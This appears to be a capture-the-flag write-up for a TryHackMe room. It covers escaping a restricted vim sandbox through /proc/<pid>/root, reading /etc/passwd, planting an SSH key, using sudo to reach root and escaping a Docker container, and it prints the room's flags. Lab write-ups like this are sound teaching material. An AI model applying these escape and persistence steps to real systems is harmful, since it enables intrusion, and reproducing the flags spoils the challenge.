TryHackMe room writeup: Frosteau Busy with Vim
This is a well-made room.
Port scan
Analysis
Connecting to port 8085 drops you straight into a vim session, which is interesting.
Try :!whoami
vim answers:
[No write since last change]
Cannot execute shell /tmp/sh
vim's 'shell' option is taken from $SHELL, so this user's login shell has evidently been pointed at /tmp/sh, which cannot be executed; that is why shell commands fail. Let's read /etc/passwd to confirm:
:e /etc/passwd
root:x:0:0:root:/root:/usr/busybox/sh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
ubuntu:x:1000:1000::/home/ubuntu:/tmp/sh
Sure enough, the ubuntu user's shell is /tmp/sh (root's is /usr/busybox/sh). Trying :e /etc/shadow only gives:
"/etc/shadow" [Permission Denied]
Testing shows that Python is usable inside this vim:
:py3 import os;os.system("ls")
produces no output at all, but print() works normally.
My guess: os.system() runs its command through /bin/sh, and there is no sh at /bin/sh here, so the call fails silently (os.system() only reports this through its return value, which the one-liner discards).
:py3 import os; print(os.listdir("/bin"))
Sure enough, the output is []
Interesting: /usr/bin is empty too.
Before I knew it an hour had passed with no lead.
On to the other ports. 8095 appears to be a nano session.
8065 disconnects immediately on connect,
but its banner does reveal Ubuntu 22.04.3 LTS.
The FTP port seems to want credentials:
User (10.10.139.102:(none)):
331 Please specify password
Password:
530 Login failed
Login failed. Let's try the anonymous user.
That actually worked.
ftp> ls
200 Operation successful
150 Directory listing
FROST-2247-SP.txt
YETI-1125-SP.txt
flag-1-of-4.txt
flag-2-of-4.sh
frostling_base.png
frostling_five.png
yeti_footage.png
yeti_mugshot.png
226 Operation successful
ftp: 149 bytes received in 0.01 seconds, 21.29 KB/s.
I had meant to use FileZilla, but for some reason it would not work. Never mind, the CLI client is fine.
Grab the first flag:
THM{Let.the.game.begin}
flag-2-of-4.sh only hints at echo $FLAG2, so the second flag is an environment variable of the service.
Remember that this vim can run Python? Straight from the vim session on 8085:
:py3 import os; print(os.environ.get('FLAG2'))
THM{Seems.like.we.are.getting.busy}
Back to the familiar vim session.
:Ex opens vim's built-in interactive file browser (netrw).
It shows that nano and vim both live under /tmp, and that the FTP root is /tmp/ftp. I tried replacing nano with bash: permission denied.
Uploading a bash binary would also mean building a static one offline first, which is a hassle.
Then :set shell=/path/to/bash
but that did not seem to work either; not sure whether it is a version issue.
Everything points to us running inside a sandbox.
Let's see whether a usable bash exists anywhere we can reach. /proc/<pid>/root is a process's own view of its root filesystem, so if processes from another mount namespace are visible, their binaries are reachable through it:
:py3 import os; [print(i) for i in range(1, 9999) if os.path.exists(f"/proc/{i}/root/usr/bin/bash")]
It returned quite a few hits; pick any one of them.
:set shell=/proc/1393/root/usr/bin/bash
:!id
/proc/1392/root/usr/bin/bash: id: command not found
shell returned 127
Hmm, still no luck.
But bash itself clearly runs now; the problem is command lookup. Exit code 127 is bash's "command not found": the borrowed bash inherits this container's PATH, whose directories (/bin, /usr/bin) we already saw are empty.
Pointing PATH at the same /proc root that holds bash should fix it:
:!PATH=/proc/1393/root/usr/bin:$PATH id
Success:
uid=1000 gid=1000(ubuntu) groups=1000(ubuntu)
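As an added example (not code from the original writeup), here is the reasoning behind the two key observations above as stand-alone Python: why the earlier :py3 os.system("ls") showed nothing, the /proc/<pid>/root search for a shell that is actually executable, and the PATH prefix that turned "shell returned 127" into a working id. demo() builds a constructed /proc look-alike in a temporary directory instead of touching the live /proc; the pids, paths and file modes in it are made up to mirror the room's symptoms.

```python
"""Added example, not from the original writeup: the vim-escape reasoning as
stand-alone Python.

 - decode_wait_status(): on POSIX os.system() returns a raw wait status; 32512
   decodes to exit code 127, what a missing /bin/sh (or an unresolvable
   command) produces, which is why the :py3 one-liner looked like "no output".
 - find_host_shells(): the /proc/<pid>/root walk, with an executability check.
 - build_escape_command(): the PATH prefix that makes the borrowed bash resolve
   plain command names.

demo() runs it over a constructed /proc tree in a temp dir (pids, paths and
modes are made up), not the live /proc.
"""
import os
import shutil
import tempfile

SHELL_CANDIDATES = ("usr/bin/bash", "bin/bash", "bin/sh", "usr/busybox/sh")


def decode_wait_status(status):
    """Turn an os.system()/os.wait() status into a plain exit code."""
    if not hasattr(os, "WIFEXITED"):
        return status  # Windows: os.system() already returns the exit code
    if os.WIFEXITED(status):
        return os.WEXITSTATUS(status)
    if os.WIFSIGNALED(status):
        return 128 + os.WTERMSIG(status)
    return status


def find_host_shells(proc="/proc", candidates=SHELL_CANDIDATES):
    """Map pid -> first executable shell visible under /proc/<pid>/root.

    Only numeric entries are processes ('self', 'sys', 'net', ... are skipped).
    An unprivileged user can only traverse /proc/<pid>/root of processes it
    could ptrace, i.e. its own uid; in the room the visible processes ran as
    the same uid 1000, which is what made the walk succeed.
    """
    found = {}
    for entry in os.listdir(proc):
        if not entry.isdigit():
            continue
        root = os.path.join(proc, entry, "root")
        for rel in candidates:
            path = os.path.join(root, rel)
            # isfile() returns False (swallows PermissionError) for roots we may
            # not look into; X_OK drops files that exist but cannot be run.
            if os.path.isfile(path) and os.access(path, os.X_OK):
                found[int(entry)] = path
                break
    return found


def build_escape_command(shell_path, cmd="id"):
    """A bash found via /proc/<pid>/root still inherits the sandbox's PATH,
    whose directories are empty, hence exit 127 on `id`.  Prefix PATH with the
    bin directory holding the shell itself so plain command names resolve."""
    bindir = os.path.dirname(shell_path)
    return f"PATH={bindir}:$PATH {cmd}"


def demo():
    """Run the search over a constructed /proc tree; returns (shells, command)."""
    base = tempfile.mkdtemp(prefix="fakeproc-")
    layout = {  # constructed layout mirroring the room's symptoms
        "1": ("usr/bin/bash", 0o644),      # exists but not executable: skipped
        "200": (None, None),               # process with no shell in its root
        "1393": ("usr/bin/bash", 0o755),   # the usable bash
        "self": ("usr/bin/bash", 0o755),   # non-numeric entry: ignored
    }
    try:
        for pid, (rel, mode) in layout.items():
            root = os.path.join(base, pid, "root")
            os.makedirs(root)
            if rel is not None:
                path = os.path.join(root, rel)
                os.makedirs(os.path.dirname(path))
                with open(path, "w") as fh:
                    fh.write("#!/bin/sh\n")
                os.chmod(path, mode)
        shells = find_host_shells(base)
        cmd = build_escape_command(shells[1393]) if 1393 in shells else None
        # relative paths keep the result independent of the temp dir name
        return {pid: os.path.relpath(p, base) for pid, p in shells.items()}, cmd
    finally:
        shutil.rmtree(base)


if __name__ == "__main__":
    print("os.system() status 32512 ->", decode_wait_status(32512))
    shells, cmd = demo()
    print("usable shells:", shells)
    print("command to run from vim with :!", cmd)
```

In the room the same idea was typed as a vim one-liner against the live /proc; the only additions here are the execute-bit check, which avoids picking a root whose bash is present but unusable, and the status decoding, which would have shown the 127 immediately instead of a silent os.system().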
Finally we can run a shell.
But we are uid 1000, the ubuntu user, so the shell is probably going to be a bit awkward to use,
and we still have no root privileges, which is frustrating.
Could we write an SSH key in instead? If /proc gets us around the sandbox for bash, the same /proc root should also expose /home/ubuntu:
echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCeQIVs/yB0/QinBBirIM+Xr2DTfdM5WxXAEbVjbMWz+VGFMZtGKO+psxxKuOjRgkkPaBC/6RyUdWsRlm4u4M0XZ6jtWVfLfnAMvkSgjPAS8y5WSmCD61niZCSRspMObPvMaKPrRqKj9Py+NgBH8Akuk5oZXcI2ffHVl6HeyUoYCVRKR13lgcYTIPYxIHJLbThdJCr3XWwhTp4BYSFrfKWA6zZZIJbLV4r1RErDYufKt6304UNM4SXH7WOJU6/1BLtzL4vpmR1MfxjdTK3zFpc0/uL8X0n9adfbzNbzruV0U/f45D5CRZT1wS3naGqnETFxuwcyWrn9D8ugEJSmEjy4uzfBP4bmUXC9sBoYjwnXqRankOFykiesKqxAzH9DYF5EmuVcuG/CSsJRe2GmrLSYhVgQ7i8V9mhGUMIOHjAPK9+w74qK19yxYgXkVHoJfTvMCtDJUfGdVhZImRH6+2p1enwNwpIi2M/msiPMbkwzNnC4c1oDz8Ky1Z/QRHVHGtk= [email protected]' > /proc/1393/root/home/ubuntu/.ssh/authorized_keys
(Note that > overwrites any existing authorized_keys; >> would append and leave the owner's keys intact.) SSH in with the matching private key:
ubuntu@tryhackme:~$ sudo su
root@tryhackme:/home/ubuntu#
Excellent: sudo su drops straight into a root shell with no password prompt. Privilege escalation done.
Now for the remaining flags.
root@tryhackme:~# cat flag-4-of-4.txt
THM{Frosteau.would.be.both.proud.and.disappointed}
root@tryhackme:~# cat yetikey3.txt
3-d2dc6a02db03401177f0511a6c99007e945d9cb9b96b8c6294f8c5a2c8e01f60
So that is what was going on: we had been inside a Docker container the whole time, and writing through /proc/<pid>/root was effectively a container escape to the host.
root@tryhackme:~# docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
3dfd50383e77 busy_busy_box "/etc/bootstrap.sh -d" 3 hours ago Up 3 hours 0.0.0.0:20-21->20-21/tcp, :::20-21->20-21/tcp, 0.0.0.0:8065->8065/tcp, :::8065->8065/tcp, 0.0.0.0:8075->8075/tcp, :::8075->8075/tcp, 0.0.0.0:8085->8085/tcp, :::8085->8085/tcp, 0.0.0.0:8095->8095/tcp, :::8095->8095/tcp, 0.0.0.0:65500-65515->65500-65515/tcp, :::65500-65515->65500-65515/tcp containers_busy_1
The published ports match what we scanned (FTP, 8065, 8075, 8085, 8095). So the third flag is probably inside the container?
root@tryhackme:~# docker exec -it 3dfd50383e77 /bin/sh
OCI runtime exec failed: exec failed: unable to start container process: exec: "/bin/sh": stat /bin/sh: no such file or directory: unknown
Right, the shell inside the container is broken. (The container's /etc/passwd listed root's shell as /usr/busybox/sh, so exec'ing that might have worked; I did not try it. Reading the container's filesystem from the host through its overlay2 merged directory works regardless.)
root@tryhackme:~# docker inspect 3dfd50383e77 | grep "MergedDir"
"MergedDir": "/var/lib/docker/overlay2/1c9f867cb5ba4581dcc22c6cfba30a011bdf1fa4f3043c74a0bbe33d46f9664b/merged",
root@tryhackme:~# cd /var/lib/docker/overlay2/1c9f867cb5ba4581dcc22c6cfba30a011bdf1fa4f3043c74a0bbe33d46f9664b/merged
root@tryhackme:/var/lib/docker/overlay2/1c9f867cb5ba4581dcc22c6cfba30a011bdf1fa4f3043c74a0bbe33d46f9664b/merged# ls
bin dev home lib32 libx32 mnt proc run srv tmp var
boot etc lib lib64 media opt root sbin sys usr
root@tryhackme:/var/lib/docker/overlay2/1c9f867cb5ba4581dcc22c6cfba30a011bdf1fa4f3043c74a0bbe33d46f9664b/merged# cd root
root@tryhackme:/var/lib/docker/overlay2/1c9f867cb5ba4581dcc22c6cfba30a011bdf1fa4f3043c74a0bbe33d46f9664b/merged/root# ls
flag-3-of-4.txt
root@tryhackme:/var/lib/docker/overlay2/1c9f867cb5ba4581dcc22c6cfba30a011bdf1fa4f3043c74a0bbe33d46f9664b/merged/root# cat flag-3-of-4.txt
THM{Not.all.roots.and.routes.are.equal}
Finally, flag 3, found inside the container's filesystem.
That completes the room; it took about three hours in total,
most of it spent on getting a working shell.
A well-made room, and I picked up several new tricks. It could serve as a freshman CTF challenge next year (half joking).